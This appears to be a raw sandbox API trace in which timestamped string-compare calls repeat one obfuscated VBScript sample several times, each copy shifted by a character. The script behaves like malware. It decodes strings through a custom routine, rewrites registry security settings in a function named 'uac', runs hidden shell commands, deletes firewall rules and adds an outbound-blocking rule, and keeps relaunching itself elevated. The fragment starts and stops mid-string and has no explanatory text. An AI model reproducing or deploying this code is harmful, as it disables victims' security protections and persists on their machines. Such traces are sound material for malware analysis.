bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.982] wcsncmp (_String1="PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0222.982] wcsncmp (_String1="ROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.982] wcsncmp (_String1="OTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.982] wcsncmp (_String1="TOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 